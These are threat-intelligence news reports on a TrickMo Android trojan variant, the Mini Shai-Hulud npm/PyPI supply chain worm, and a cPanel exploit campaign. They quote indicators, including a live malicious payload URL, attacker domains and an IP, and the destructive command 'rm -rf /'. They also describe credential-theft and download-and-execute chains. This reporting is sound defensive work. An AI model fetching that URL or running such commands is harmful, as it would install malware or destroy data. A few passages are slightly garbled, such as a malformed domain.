Author: anonymousmedia_tal70o

Ravie LakshmananMay 12, 2026Malware / Mobile Security

Cybersecurity researchers have flagged a new version of the TrickMo Android banking trojan that uses The Open Network (TON) for command-and-control (C2).

The new variant, observed by ThreatFabric between January and February 2026, has been observed actively targeting banking and cryptocurrency wallet users in France, Italy, and Austria.

“TrickMo relies on a runtime-loaded APK  (dex.module), used also by the previous variant, but updated with new features adding new network-oriented functionality, including reconnaissance, SSH tunnelling, and SOCKS5 proxying capabilities that allow infected devices to function as programmable network pivots and traffic-exit nodes,” the Dutch mobile security company said in a report shared with The Hacker News.

TrickMo is the name assigned to a device takeover (DTO) malware that’s been active in the wild since late 2019. It was first flagged by CERT-Bund and IBM X-Force, describing its ability to abuse Android’s accessibility services to hijack one-time passwords (OTPs).

It’s also equipped with a wide range of features to phish for credentials, log keystrokes, record screen, facilitate live screen streaming, intercept SMS messages, essentially granting the operator complete remote control of the device.

The latest versions, labeled TrickMo C, are distributed via phasing websites and dropper apps, the latter of which serve as a conduit for a dynamically loaded APK (“dex.module”) that’s retrieved at runtime from attacker-controlled infrastructure. A notable shift in the architecture entails the use of the TON decentralized blockchain for stealthy C2 communications.

“TrickMo carries an embedded native TON proxy that the host APK starts on a loopback port at process start,” ThreatFabric said. “The bot’s HTTP client is wired through that proxy, so every outbound command-and-control request is addressed to an .adnl hostname and resolved through the TON overlay.”

Dropper apps containing the malware masquerade as adult-friendly versions of TikTok through Facebook, whereas the actual malware impersonates Google Play Services –

• com.app16330.core20461 or com.app15318.core1173 (Dropper)
• uncle.collop416.wifekin78 or nibong.lida531.butler836 (TrickMo)

While previous iterations of “dex.module” implemented the accessibility-driven remote control functionality through a socket.io-based channel, the new version utilizes a network-operative subsystem that turns the malware into a tool for managed foothold than a traditional banking trojan.

The subsystem supports commands like curl, dnslookup, ping, telnet, and traceroute, giving the attacker a “remote shell-equivalent for network reconnaissance from the victim’s network position, including any internal corporate or home network the device is currently associated with,” per ThreatFabric.

Another important feature is a SOCKS5 proxy that turns the compromised device into a network exit node that routes malicious traffic, while defeating IP-based fraud-detection signatures on banking, e-commerce and cryptocurrency exchange services.

Furthermore, TrickMo includes two dormant features that bundle the Pine hooking framework and declare extensive NFC-related permissions. But neither of them are actually implemented. This likely indicates the core developers are looking to expand on the trojan’s capabilities in the future. 

“Instead of relying on conventional DNS and public internet infrastructure, the malware communicates through .adnl endpoints routed via an embedded local TON proxy, reducing the effectiveness of traditional takedown and network-blocking efforts while making the traffic blend with legitimate TON activity,” ThreatFabric said.

“This latest variant also expands the operational role of infected devices through SSH tunnelling and authenticated SOCKS5 proxying, effectively turning compromised phones into programmable network pivots and traffic-exit nodes whose connections originate from the victim’s own network environment.”

TeamPCP, the threat actor behind the recent supply chain attack spree, has been linked to the compromise of the npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI as part of a fresh Mini Shai-Hulud campaign.

The affected npm packages have been modified to include an obfuscated JavaScript file (“router_init.js”) that’s designed to profile the execution environment and launch a comprehensive credential stealer capable of targeting cloud providers, cryptocurrency wallets, AI tools, messaging apps, and CI systems, including Github Actions, Aikido Security, Endor Labs, SafeDep, Socket, and StepSecurity said. The data is exfiltrated to the “filev2.getsession[.]org” domain.

Using Session Protocol infrastructure is a deliberate attempt on the part of the attackers to evade detection, as the domain is unlikely to be blocked within enterprise environments, given that it belongs to a decentralized, privacy-focused messaging service. As a fallback option, the encrypted data is committed to attacker-controlled repositories under the author name “claude@users.noreply.github.com” via the GitHub GraphQL API using the stolen GitHub tokens.

The malware is also capable of establishing persistence hooks in Claude Code and Microsoft Visual Studio Code (VS Code) to survive reboots and re-execute the stealer on every launch of the IDEs.

Furthermore, it installs a gh-token-monitor service to monitor and re-exfiltrate GitHub tokens, and injects two malicious GitHub Actions workflows to serialize repository secrets into a JSON object and upload the data to an external server (“api.masscan[.]cloud”). 

TanStack has since traced the compromise to a chained GitHub Actions attack involving the “pull_request_target” trigger, GitHub Actions cache poisoning, and runtime memory extraction of an OIDC token from the GitHub Actions runner process. “No npm tokens were stolen, and the npm publish workflow itself was not compromised,” TanStack said.

Specifically, the attackers are assessed to have staged the malicious payload in a GitHub fork, injected it into published npm tarballs, then hijacked the project’s legitimate “TanStack/router” workflow to publish the compromised versions with valid SLSA provenance. 

What makes the worm stand out is its ability to spread itself to other packages by locating a publishable npm token with bypass_2fa set to true, enumerating every package published by the same maintainer, and exchanging a GitHub OIDC token for a per-package publish token to sidestep traditional authentication entirely.

The TanStack supply chain compromise has been assigned the CVE identifier CVE-2026-45321. It carries a CVSS score of 9.6 out of a maximum of 10.0, indicating critical severity. The incident has impacted 42 packages and 84 versions across the TanStack ecosystem.

“The attack published malicious versions through the project’s own GitHub Actions release pipeline using hijacked OIDC tokens,” StepSecurity researcher Ashish Kurmi said.

“In an extremely rare escalation, the compromised packages carry valid SLSA Build Level 3 provenance attestations, making this the first documented npm worm that produces validly attested malicious packages. The worm has since spread beyond TanStack to packages from UiPath, DraftLab, and other maintainers.”

Besides TanStack, the Mini Shai-Hulud campaign has also spread to several other packages, including some in PyPI –

• guardrails-ai@0.10.1 (PyPI)
• mistralai@2.4.6 (PyPI)
• @opensearch-project/opensearch@3.5.3, 3.6.2, 3.7.0, and 3.8.0
• @squawk/mcp@0.9.5
• @squawk/weather@0.5.10
• @squawk/flightplan@0.5.6
• @tallyui/connector-medusa@1.0.1, 1.0.2, and 1.0.3
• @tallyui/connector-vendure@1.0.1, 1.0.2, and 1.0.3

Microsoft, in its analysis of the malicious mistralai PyPI package, said it’s designed to download a credential stealer from a remote server (“83.142.209[.]194”) that includes country-aware logic to avoid Russian-language environments and a “geofenced destructive branch that has a 1-in-6 chance of executing rm -rf / when the system appears to be in Israel or Iran.”

“The guardrails-ai@0.10.1 compromise is especially notable because the malicious code executes on import,” Socket said. “The package checks for Linux systems, downloads a remote Python artifact from https://git-tanstack.com/transformers.pyz, writes it to /tmp/transformers.pyz, and executes it with python3 without integrity verification.”

“This latest activity shows the campaign continuing to propagate across both npm and PyPI, with affected packages spanning search infrastructure, AI tooling, aviation-related developer packages, enterprise automation, frontend tooling, and CI/CD-adjacent ecosystems.”

Ravie LakshmananMay 11, 2026Vulnerability / Ransomware

A threat actor named Mr_Rot13 has been attributed to the exploitation of a recently disclosed critical cPanel flaw to deploy a backdoor codenamed Filemanager on compromised environments.

The attack exploits CVE-2026-41940, a vulnerability impacting cPanel and WebHost Manager (WHM) that could result in an authentication bypass and allow remote attackers to gain elevated control of the control panel.

According to a new report from QiAnXin XLab, the security defect has been exploited by a number of threat actors shortly after its public disclosure late last month, resulting in malicious behaviors like cryptocurrency mining, ransomware, botnet propagation, and backdoor implantation.

“Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability,” XLab researchers said. “These IPs are distributed across multiple regions globally, primarily originating from Germany, the United States, Brazil, the Netherlands, and other regions.”

Further analysis of the ongoing exploitation activity has uncovered a shell script that uses wget or curl to download a Go-based infector from a remote server (“cp.dene.[de[.]com”) that’s designed to implant a compromised cPanel system with an SSH public key for persistent access, along with dropping a PHP web shell that facilitates file upload/download and remote command execution.

The web shell is then used to inject JavaScript code to serve a customized login page to steal login credentials and siphon them to an attacker-controlled system that’s encoded using the ROT13 cipher (“wrned[.]com“). Once the details are transmitted, the attack chain culminates with the deployment of a cross-platform backdoor that’s capable of infecting Windows, macOS, and Linux systems.

The infector is also equipped to collect sensitive information from the compromised host, including bash history, SSH data, device information, database passwords, and cPanel virtual aliases (aka valiases), to a 3-member Telegram group created by a user named “0xWR.”

In the infection sequence analyzed by XLab, Filemanager is delivered via a shell script downloaded from the “wpsock[.]com” domain. The backdoor supports file management, remote command execution, and shell functionality.

There are signs that the threat actor behind the operation has been operating silently in the shadows for years. This assessment is based on the fact that the command-and-control (C2) domain embedded in the JavaScript code has been put to use in a PHP-based backdoor (“helper.php“) that was uploaded to the VirusTotal platform in April 2022. The domain was first registered in October 2020.

“Over the six years from 2020 to the present, the detection rate of Mr_Rot13’s related samples and infrastructure across security products has remained extremely low,” XLab said.